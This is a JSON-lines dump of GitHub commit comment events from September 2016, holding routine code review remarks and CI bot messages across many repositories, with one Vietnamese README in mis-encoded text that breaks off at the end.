{"id":"4624121718","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190425,"position":80,"line":80,"path":"language-project/web/src/main/java/language/servlet/RegistrationController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:20:51Z","updated_at":"2016-09-27T13:20:51Z","body":"можно возвращать boolean и избавиться от флага allFilled"}},"created_at":"2016-09-27T13:20:51Z"}
{"id":"4624130529","type":"CommitCommentEvent","actor":{"login":"larryaasen"},"repo":{"name":"CocoaPods/Specs"},"payload":{"comment":{"id":19190437,"position":17,"line":17,"path":"Specs/NewRelicAgentTVOS/5.8.0/NewRelicAgentTVOS.podspec.json","commit_id":"52fe99f6536ab8d5063f3b8534345d53bb335611","created_at":"2016-09-27T13:21:42Z","updated_at":"2016-09-27T13:21:42Z","body":"@kennr This URL does not download the ZIP file: https://download.newrelic.com/tvos_agent/NewRelic_tvOS_Agent_5.8.0.zip"}},"created_at":"2016-09-27T13:21:42Z"}
{"id":"4624133046","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190438,"position":null,"line":null,"path":null,"commit_id":"87ccbf218d5e94439826f3d5fadff9b7d9fe499f","created_at":"2016-09-27T13:21:54Z","updated_at":"2016-09-27T13:21:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1174](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14336&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T13:21:54Z"}
{"id":"4624135403","type":"CommitCommentEvent","actor":{"login":"blairmacintyre"},"repo":{"name":"argonjs/nativescript-screen-orientation"},"payload":{"comment":{"id":19190440,"position":null,"line":null,"path":null,"commit_id":"d18a3bb17fd986f7843efd0b81e2727ff91a3a07","created_at":"2016-09-27T13:22:06Z","updated_at":"2016-09-27T13:22:06Z","body":"Well, it \"sort of works\" in Argon4:  when I go into \"viewer mode\", things rotate to landscape like they should, which is what this plugin is doing.  (But if I rotate the phone, it will rotate to other views.  We need to dramatically change how we do this, I think.  )\r\n\r\nWhat doesn't work?"}},"created_at":"2016-09-27T13:22:06Z"}
{"id":"4624140937","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19190454,"position":null,"line":null,"path":null,"commit_id":"b19d860cc82d5c6dc024d35a8fd3138c2fcdfd30","created_at":"2016-09-27T13:22:50Z","updated_at":"2016-09-27T13:22:50Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#S_DvGIMdSB25gLkj2ze8gw"}},"created_at":"2016-09-27T13:22:50Z"}
{"id":"4624140969","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190455,"position":72,"line":72,"path":"language-project/web/src/main/java/language/servlet/SignInController.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:22:50Z","updated_at":"2016-09-27T13:22:50Z","body":"можно возвращать boolean и избавиться от флага allFilled"}},"created_at":"2016-09-27T13:22:50Z"}
{"id":"4624147991","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190474,"position":null,"line":null,"path":null,"commit_id":"87ccbf218d5e94439826f3d5fadff9b7d9fe499f","created_at":"2016-09-27T13:23:57Z","updated_at":"2016-09-27T13:23:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1174](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14336&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:03"}},"created_at":"2016-09-27T13:23:57Z"}
{"id":"4624153532","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190482,"position":15,"line":331,"path":"osu.Framework/Graphics/OpenGL/Textures/TextureGLSingle.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:24:56Z","updated_at":"2016-09-27T13:24:56Z","body":"this is a horribly ugly fix for the gl-level texture init issues. it's how we used to init textures, but has an allocation overhead.\r\n\r\n\r\ncan't figure why the fbo glClear method below isn't working."}},"created_at":"2016-09-27T13:24:56Z"}
{"id":"4624155623","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190489,"position":null,"line":null,"path":null,"commit_id":"45f3f203010287f4816b76b449134a8eb1668d1b","created_at":"2016-09-27T13:25:17Z","updated_at":"2016-09-27T13:25:17Z","body":"This commit should be squashed into the original one"}},"created_at":"2016-09-27T13:25:17Z"}
{"id":"4624157315","type":"CommitCommentEvent","actor":{"login":"hadley"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":19190492,"position":null,"line":null,"path":null,"commit_id":"707cbc92a0e5e9cc4f0b81453916394f4fbe70c2","created_at":"2016-09-27T13:25:34Z","updated_at":"2016-09-27T13:25:34Z","body":"Would you mind bumping the minor version too? Just so I have something to check for"}},"created_at":"2016-09-27T13:25:34Z"}
{"id":"4624158188","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19190493,"position":null,"line":null,"path":null,"commit_id":"6b531690b65f69b7f194df55c8d3ab7cb60830e4","created_at":"2016-09-27T13:25:43Z","updated_at":"2016-09-27T13:25:43Z","body":"@nekrozar why don't we use `aux.AddXyzProcedure`, just like _Cyber Dragon Infinity_ ?"}},"created_at":"2016-09-27T13:25:43Z"}
{"id":"4624158381","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19190495,"position":null,"line":null,"path":null,"commit_id":"6b1ae0448004bea94154ac6a489afffb4045adc2","created_at":"2016-09-27T13:25:46Z","updated_at":"2016-09-27T13:25:46Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_kv/builds/3979\n"}},"created_at":"2016-09-27T13:25:46Z"}
{"id":"4624158868","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190498,"position":27,"line":47,"path":"osu.Framework/Graphics/Textures/TextureStore.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:25:51Z","updated_at":"2016-09-27T13:25:51Z","body":"use atlas in all cases. the way you had it was creating new textures every glyph and bypassing a whole heap of stuff we want (also causing edge-of-texture artifacts)"}},"created_at":"2016-09-27T13:25:51Z"}
{"id":"4624159244","type":"CommitCommentEvent","actor":{"login":"mvayngrib"},"repo":{"name":"marcshilling/react-native-image-picker"},"payload":{"comment":{"id":19190499,"position":null,"line":null,"path":null,"commit_id":"903003ad004ccf3ee3a2a6a883c30785d6b5ecc8","created_at":"2016-09-27T13:25:55Z","updated_at":"2016-09-27T13:25:55Z","body":"@marcshilling oof, this was a breaking change for me! Quality going up from 0.2 to 1 had my app becoming unresponsive and crashing. Couldn't figure out why for the longest time... Glad that's over :)"}},"created_at":"2016-09-27T13:25:55Z"}
{"id":"4624160407","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190506,"position":5,"line":5,"path":"language-project/dao/.settings/org.eclipse.wst.common.project.facet.core.xml","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:26:07Z","updated_at":"2016-09-27T13:26:07Z","body":"Добавляются автоматически. Вопрос задал по .gitignore - ответ не получил."}},"created_at":"2016-09-27T13:26:07Z"}
{"id":"4624160654","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190507,"position":25,"line":67,"path":"osu.Framework/IO/Stores/GlyphStore.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:26:09Z","updated_at":"2016-09-27T13:26:09Z","body":"naive fix for initialising surrounding pixels to transparentwhite"}},"created_at":"2016-09-27T13:26:09Z"}
{"id":"4624162973","type":"CommitCommentEvent","actor":{"login":"greenwald"},"repo":{"name":"flav-io/flavio"},"payload":{"comment":{"id":19190512,"position":null,"line":null,"path":null,"commit_id":"a2ac80cf59d089ba78ef8fcec1886397465dc8d0","created_at":"2016-09-27T13:26:34Z","updated_at":"2016-09-27T13:26:34Z","body":"Well, I wasn't that emphatic. But for your surety, I have checked the Oxford English Dictionary:\r\n\r\nConvolute, verb (with object): \"Make (an argument, story, etc.) complex and difficult to follow.\"\r\nConvolve, verb (with object); mathematical meaning: \"Combine (one function or series) with another by forming their convolution.\"\r\n\r\nAs for the adjectives:\r\n\r\nConvoluted: \"(especially of an argument, story, or sentence) extremely complex and difficult to follow.\" With a technical meaning, \"Intricately folded, twisted, or coiled.\"\r\n\r\nThere is no entry for \"convolved\"; but it is the past participle of \"convolve,\" which can be used as an adjective."}},"created_at":"2016-09-27T13:26:34Z"}
{"id":"4624163719","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190514,"position":27,"line":47,"path":"osu.Framework/Graphics/Textures/TextureStore.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:26:41Z","updated_at":"2016-09-27T13:26:41Z","body":"I didn't change this, I just moved around/copied existing code. Will fix anyway."}},"created_at":"2016-09-27T13:26:41Z"}
{"id":"4624163732","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190515,"position":5,"line":95,"path":"shim/shim.c","commit_id":"77f0950d3cf7ce34c8d37f371bff84c5f400d18a","created_at":"2016-09-27T13:26:41Z","updated_at":"2016-09-27T13:26:41Z","body":"How about just using htonl() and ntohl()?"}},"created_at":"2016-09-27T13:26:41Z"}
{"id":"4624166182","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190519,"position":25,"line":67,"path":"osu.Framework/IO/Stores/GlyphStore.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:27:05Z","updated_at":"2016-09-27T13:27:05Z","body":"This is the way I'd do it tbh"}},"created_at":"2016-09-27T13:27:05Z"}
{"id":"4624168793","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190527,"position":null,"line":null,"path":null,"commit_id":"3909bea8a81ffb406a8ce4ff9c5138add3f9cc59","created_at":"2016-09-27T13:27:33Z","updated_at":"2016-09-27T13:27:33Z","body":"Missing the addition in .gitignore"}},"created_at":"2016-09-27T13:27:33Z"}
{"id":"4624171850","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190535,"position":15,"line":331,"path":"osu.Framework/Graphics/OpenGL/Textures/TextureGLSingle.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:28:06Z","updated_at":"2016-09-27T13:28:06Z","body":"Is the allocation overhead really worse than the overhead of setting up a framebuffer and drawing a frame? Especially for every texture load?"}},"created_at":"2016-09-27T13:28:06Z"}
{"id":"4624172435","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190536,"position":11,"line":13,"path":"language-project/web/src/main/webapp/views/registration.jsp","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:28:12Z","updated_at":"2016-09-27T13:28:12Z","body":"можно использовать тег lable"}},"created_at":"2016-09-27T13:28:12Z"}
{"id":"4624172870","type":"CommitCommentEvent","actor":{"login":"GauravMakwana-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190537,"position":7,"line":5,"path":"app/assets/javascripts/common.js","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:28:15Z","updated_at":"2016-09-27T13:28:15Z","body":"@ChakreshwarSharma-BTC  resolved "}},"created_at":"2016-09-27T13:28:15Z"}
{"id":"4624172966","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19190538,"position":11,"line":7,"path":"ci/travis/linux/before_install.sh","commit_id":"9c32fcc153f2da071aaaa19d5abfab517a548076","created_at":"2016-09-27T13:28:16Z","updated_at":"2016-09-27T13:28:16Z","body":"Oi!! ;)\r\n\r\nDW - your scripts are much more elegant then mine so happy for you to have the credit!\r\n\r\n"}},"created_at":"2016-09-27T13:28:16Z"}
{"id":"4624174017","type":"CommitCommentEvent","actor":{"login":"mattheworiordan"},"repo":{"name":"ably/tutorials"},"payload":{"comment":{"id":19190540,"position":null,"line":null,"path":null,"commit_id":"59dcc5694f011b4f244837da57d95fec9f5b1679","created_at":"2016-09-27T13:28:27Z","updated_at":"2016-09-27T13:28:27Z","body":"Nice, but I think the step is 2b) unfortunately as the previous one was 2a)"}},"created_at":"2016-09-27T13:28:27Z"}
{"id":"4624175704","type":"CommitCommentEvent","actor":{"login":"GauravMakwana-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190542,"position":8,"line":6,"path":"app/assets/javascripts/common.js","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:28:45Z","updated_at":"2016-09-27T13:28:45Z","body":"@ChakreshwarSharma-BTC resolved "}},"created_at":"2016-09-27T13:28:45Z"}
{"id":"4624177092","type":"CommitCommentEvent","actor":{"login":"peppy"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190546,"position":15,"line":331,"path":"osu.Framework/Graphics/OpenGL/Textures/TextureGLSingle.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:29:00Z","updated_at":"2016-09-27T13:29:00Z","body":"yes. consider we only create textures about 5 times *ever* (texture atlasing)."}},"created_at":"2016-09-27T13:29:00Z"}
{"id":"4624177648","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190547,"position":5,"line":14,"path":"language-project/dao/src/main/java/com/language/dao/UserDao.java","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:29:06Z","updated_at":"2016-09-27T13:29:06Z","body":"в основном используют слово update а не alter\r\n   - Это не существенно\r\nТебе точно нужно передавать в параметрах User user или достаточно будет int id ?\r\n   -  Достаточно Id, не вижу существенной разницы, user дает больше возможностей для изменений в будующем."}},"created_at":"2016-09-27T13:29:06Z"}
{"id":"4624178821","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19190549,"position":9,"line":14,"path":"language-project/web/src/main/webapp/views/signIn.jsp","commit_id":"d42290f4bf4989fcf929d06843b604e4cdfe4a4c","created_at":"2016-09-27T13:29:19Z","updated_at":"2016-09-27T13:29:19Z","body":"можно использовать тег lable"}},"created_at":"2016-09-27T13:29:19Z"}
{"id":"4624179539","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190551,"position":60,"line":60,"path":"shim/shim.c","commit_id":"3909bea8a81ffb406a8ce4ff9c5138add3f9cc59","created_at":"2016-09-27T13:29:25Z","updated_at":"2016-09-27T13:29:25Z","body":"That seems a bit drastic, we could probably ignore the signal instead"}},"created_at":"2016-09-27T13:29:25Z"}
{"id":"4624180072","type":"CommitCommentEvent","actor":{"login":"xueyinz"},"repo":{"name":"lkm1321/mtrx3700-major"},"payload":{"comment":{"id":19190554,"position":null,"line":null,"path":null,"commit_id":"75a8c53af09540bc4cc5d77f757e893e9bdb864c","created_at":"2016-09-27T13:29:31Z","updated_at":"2016-09-27T13:29:31Z","body":"First time using git. Hope i didn't break anything :/"}},"created_at":"2016-09-27T13:29:31Z"}
{"id":"4624181750","type":"CommitCommentEvent","actor":{"login":"leslieyuan"},"repo":{"name":"leslieyuan/WeiboCoo"},"payload":{"comment":{"id":19190559,"position":49,"line":91,"path":"WeiboCoo/WriteWeiboViewController.swift","commit_id":"777b0d291f70745cdd77d130b29d659f103e50ed","created_at":"2016-09-27T13:29:49Z","updated_at":"2016-09-27T13:29:49Z","body":"fe"}},"created_at":"2016-09-27T13:29:49Z"}
{"id":"4624183527","type":"CommitCommentEvent","actor":{"login":"GauravMakwana-BTC"},"repo":{"name":"ChakreshwarSharma-BTC/agent-assist"},"payload":{"comment":{"id":19190564,"position":12,"line":10,"path":"app/assets/javascripts/common.js","commit_id":"115a7f4e428e31fac4eacfd18676738ac102cd13","created_at":"2016-09-27T13:30:08Z","updated_at":"2016-09-27T13:30:08Z","body":"@ChakreshwarSharma-BTC resolved "}},"created_at":"2016-09-27T13:30:08Z"}
{"id":"4624186861","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19190575,"position":null,"line":null,"path":null,"commit_id":"87ccbf218d5e94439826f3d5fadff9b7d9fe499f","created_at":"2016-09-27T13:30:37Z","updated_at":"2016-09-27T13:30:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1175](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14338&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T13:30:37Z"}
{"id":"4624187896","type":"CommitCommentEvent","actor":{"login":"tutipeti"},"repo":{"name":"joshdholtz/Sentry-Android"},"payload":{"comment":{"id":19190580,"position":36,"line":242,"path":"sentry-android/src/main/java/com/joshdholtz/sentry/Sentry.java","commit_id":"07b84c7146d5c4cb38762a6bd13b2543785493bf","created_at":"2016-09-27T13:30:47Z","updated_at":"2016-09-27T13:30:47Z","body":"Next time could you please keep the original method?\r\nI spent quite some time now trying to figure out what changed in my project only to realize this was the cause. Thanks!"}},"created_at":"2016-09-27T13:30:47Z"}
{"id":"4624187900","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19190581,"position":null,"line":null,"path":null,"commit_id":"11b2e275b8b43e914d9a5d06be40aeab2d9ac510","created_at":"2016-09-27T13:30:47Z","updated_at":"2016-09-27T13:30:47Z","body":"This last one I agree with -- disabling text input on start is probably the right thing to do."}},"created_at":"2016-09-27T13:30:47Z"}
{"id":"4624188876","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190584,"position":109,"line":109,"path":"shim/shim.c","commit_id":"3909bea8a81ffb406a8ce4ff9c5138add3f9cc59","created_at":"2016-09-27T13:30:57Z","updated_at":"2016-09-27T13:30:57Z","body":"Could print a usage help string."}},"created_at":"2016-09-27T13:30:57Z"}
{"id":"4624192529","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19190592,"position":14,"line":87,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-27T13:31:35Z","updated_at":"2016-09-27T13:31:35Z","body":"kommt es durch den führenden Doppelpunkt zu Fehlermeldungen oder funktioniert etwas nicht?\r\nIch habe dies vom 00_CUL.pm abgeschaut:\r\n```\r\nmy $clientsSlowRF    = \":FS20:FHT.*:KS300:USF1000:BS:HMS: \".\r\n                       \":CUL_EM:CUL_WS:CUL_FHTTK:CUL_HOERMANN: \".\r\n                       \":ESA2000:CUL_IR:CUL_TX:Revolt:IT:UNIRoll:SOMFY: \".\r\n                       \":STACKABLE_CC:CUL_RFR::CUL_TCM97001:CUL_REDIRECT:\";\r\n```"}},"created_at":"2016-09-27T13:31:35Z"}
{"id":"4624192676","type":"CommitCommentEvent","actor":{"login":"kirbyfan64"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19190593,"position":4,"line":135,"path":"spec/std/yaml/serialization_spec.cr","commit_id":"20aa5d3a92eaa860bec3e6fdda672ad55a7c831a","created_at":"2016-09-27T13:31:35Z","updated_at":"2016-09-27T13:31:35Z","body":"Maybe I'm missing the obvious...but I think you meant \"**with** stars\"!"}},"created_at":"2016-09-27T13:31:35Z"}
{"id":"4624195521","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo"},"payload":{"comment":{"id":19190597,"position":28,"line":259,"path":"src/client/cl_keys.c","commit_id":"11b2e275b8b43e914d9a5d06be40aeab2d9ac510","created_at":"2016-09-27T13:32:05Z","updated_at":"2016-09-27T13:32:05Z","body":"The above changes skeeve me out a little bit. For starters, we're enabling text input over and over again, on every key event in that dest. Secondly, won't this miss the first text event in that dest? A key-down will initiate SDL_StartTextInput, but then will a text event for that key itself be fired/"}},"created_at":"2016-09-27T13:32:05Z"}
{"id":"4624197227","type":"CommitCommentEvent","actor":{"login":"SirCmpwn"},"repo":{"name":"peppy/osu-framework"},"payload":{"comment":{"id":19190602,"position":15,"line":331,"path":"osu.Framework/Graphics/OpenGL/Textures/TextureGLSingle.cs","commit_id":"f3b1a4be3160074baaf3ae094df723b890f0fea1","created_at":"2016-09-27T13:32:21Z","updated_at":"2016-09-27T13:32:21Z","body":"Seems legit. Consider that the allocation overhead is unimportant for the same reasons."}},"created_at":"2016-09-27T13:32:21Z"}
{"id":"4624197598","type":"CommitCommentEvent","actor":{"login":"marcomorain"},"repo":{"name":"joshdholtz/Sentry-Android"},"payload":{"comment":{"id":19190603,"position":36,"line":242,"path":"sentry-android/src/main/java/com/joshdholtz/sentry/Sentry.java","commit_id":"07b84c7146d5c4cb38762a6bd13b2543785493bf","created_at":"2016-09-27T13:32:25Z","updated_at":"2016-09-27T13:32:25Z","body":"@tutipeti sorry about that - I wasn't thinking."}},"created_at":"2016-09-27T13:32:25Z"}
{"id":"4624203028","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19190622,"position":null,"line":null,"path":null,"commit_id":"8e162b047247c33c0df60118e19eec31dec7950d","created_at":"2016-09-27T13:33:18Z","updated_at":"2016-09-27T13:33:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aLOs8uRnRgSxgLgg-yXgOQ"}},"created_at":"2016-09-27T13:33:18Z"}
{"id":"4624203054","type":"CommitCommentEvent","actor":{"login":"mkj58"},"repo":{"name":"mkj58/Kodi-Build-Tracker"},"payload":{"comment":{"id":19190624,"position":4,"line":4,"path":"feed.xml","commit_id":"83ca75c2f9e93930f032ce6c7bf2f5a405d702a6","created_at":"2016-09-27T13:33:18Z","updated_at":"2016-09-27T13:33:18Z","body":"m"}},"created_at":"2016-09-27T13:33:18Z"}
{"id":"4624208279","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19190638,"position":15,"line":232,"path":"nuxeo-core/nuxeo-core-event/src/test/java/org/nuxeo/ecm/core/work/WorkManagerTest.java","commit_id":"27a777e3e40c118a2f856a8003fec5ce525998f5","created_at":"2016-09-27T13:34:11Z","updated_at":"2016-09-27T13:34:11Z","body":"This deserves at least a comment."}},"created_at":"2016-09-27T13:34:11Z"}
{"id":"4624208972","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19190639,"position":null,"line":null,"path":null,"commit_id":"f513adb0dc7f86f2e5265a7cdc174af51191d330","created_at":"2016-09-27T13:34:18Z","updated_at":"2016-09-27T13:34:18Z","body":"i can't get you point \r\nit can but it too hard to code \r\n\r\nfunction 100lvup can help you fram\r\ni set  normal farm then second profile to change farm jewel or accessory \r\nat 7am it reset  i plan to use schedule to change back profile to first profile\r\nmy eng bad too i would you understand"}},"created_at":"2016-09-27T13:34:18Z"}
{"id":"4624209791","type":"CommitCommentEvent","actor":{"login":"TroyStambaugh"},"repo":{"name":"TroyStambaugh/TroyStambaugh.github.io"},"payload":{"comment":{"id":19190642,"position":null,"line":null,"path":null,"commit_id":"b7874f69b8c10a13f2b8a65ab98ad928363c7863","created_at":"2016-09-27T13:34:26Z","updated_at":"2016-09-27T13:34:26Z","body":"can not get file to become clickable in github"}},"created_at":"2016-09-27T13:34:26Z"}
{"id":"4624215796","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"amshinde/cc-oci-runtime-1"},"payload":{"comment":{"id":19190652,"position":119,"line":119,"path":"shim/shim.c","commit_id":"3909bea8a81ffb406a8ce4ff9c5138add3f9cc59","created_at":"2016-09-27T13:35:29Z","updated_at":"2016-09-27T13:35:29Z","body":"indeed, signalfd() is a nice alternative!"}},"created_at":"2016-09-27T13:35:29Z"}
{"id":"4624218719","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sam828/relaxr-landing-page"},"payload":{"comment":{"id":19190663,"position":36,"line":36,"path":"css/style.css","commit_id":"95e7dc4dedf33be91073c02fa9bb9949ed2f631f","created_at":"2016-09-27T13:36:01Z","updated_at":"2016-09-27T13:36:01Z","body":"lowercase \"bold\""}},"created_at":"2016-09-27T13:36:01Z"}
{"id":"4624221489","type":"CommitCommentEvent","actor":{"login":"andela-oeyiowuawi"},"repo":{"name":"andela-tpeters/peictt"},"payload":{"comment":{"id":19190669,"position":16,"line":23,"path":"lib/peictt.rb","commit_id":"d9eb76fc5188a69072d049fd60aad459fa3a328b","created_at":"2016-09-27T13:36:27Z","updated_at":"2016-09-27T13:36:27Z","body":"this is an instance variable, by defaukt if you call an instance variable that is unassigned, it will be nil. You might want to do away with this line"}},"created_at":"2016-09-27T13:36:27Z"}
{"id":"4624222042","type":"CommitCommentEvent","actor":{"login":"giathanhphat"},"repo":{"name":"giathanhphat/homework1"},"payload":{"comment":{"id":19190671,"position":null,"line":null,"path":null,"commit_id":"2d6d7691b685348af7497968443c1565568d6c55","created_at":"2016-09-27T13:36:32Z","updated_at":"2016-09-27T13:36:32Z","body":"# Homework 1 - *Name of App*\r\n\r\n**Name of your app** ÄÃ¢y lÃ  trang web cho phÃ©p ngÆ°á»i dÃ¹ng viáº¿t blog. Thá»i gian ná»™p: 0h ngÃ y 3/10\r\n\r\nDanh sÃ¡ch sinh viÃªn: **Your Name Here**\r\n\r\nURL: **Insert your Heroku URL here**\r\n\r\n## Chá»©c nÄƒng\r\n\r\nDanh sÃ¡ch chá»©c nÄƒng **báº¯t buá»™c**:\r\n\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ táº¡o bÃ i blog má»›i.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ cáº­p nháº­t láº¡i ná»™i dung bÃ i blog.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ thÃªm comment vÃ o cÃ¡c bÃ i Ä‘Äƒng.\r\n* [ ] Sá»­ dá»¥ng bootstrap Ä‘á»ƒ táº¡o layout cho trang web. Sá»­ dá»¥ng [Bootstrap](https://rubygems.org/gems/bootstrap/versions/4.0.0.alpha3).\r\n* [ ] BÃ i Ä‘Äƒng sáº½ Ä‘Æ°á»£c format báº±ng markdown. Sá»­ dá»¥ng [RedCarpet gem](https://github.com/vmg/redcarpet).\r\n\r\nDanh sÃ¡ch chá»©c nÄƒng **phá»¥**:\r\n\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ xÃ³a cÃ¡c bÃ i Ä‘Ã£ Ä‘Äƒng vÃ  cÃ³ hiá»‡n cÃ¢u há»i yÃªu cáº§u xÃ¡c nháº­n láº¡i trÆ°á»›c khi xÃ³a.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ tÃ¬m kiáº¿m cÃ¡c bÃ i Ä‘Äƒng cÃ³ tiÃªu Ä‘á» chá»©a tá»« khÃ³a ngÆ°á»i dÃ¹ng Ä‘Ã£ nháº­p.\r\n* [ ] NgÆ°á»i dÃ¹ng Ä‘Æ°á»£c phÃ©p Ä‘Äƒng nháº­p, Ä‘Äƒng xuáº¥t\r\n* [ ] Báº£o máº­t máº­t kháº©u tÃ i khoáº£n ngÆ°á»i dÃ¹ng khi Ä‘Äƒng kÃ½. Sá»§ dá»¥ng [Bcrypt](https://github.com/codahale/bcrypt-ruby).\r\n* [ ] Má»—i bÃ i Ä‘Äƒng cÃ³ chá»©a nhiá»u tag. VÃ  ngÆ°á»i dÃ¹ng cÃ³ thá»ƒ tÃ¬m kiáº¿m theo tag.\r\n* [ ] CÃ³ thá»ƒ xem bao nhiÃªu lÆ°á»£t xe á»Ÿ má»—i bÃ i Ä‘Äƒng.\r\n\r\nDanh sÃ¡ch chá»©c nÄƒng **thÃªm** Ä‘Ã£ lÃ m nhÆ°ng chÆ°a Ä‘Æ°á»£c liá»‡t kÃª á»Ÿ trÃªn:\r\n\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ thá»ƒ Ä‘Äƒng nháº­p vá»›i Facebook.\r\n* [ ] NgÆ°á»i dÃ¹ng cÃ³ 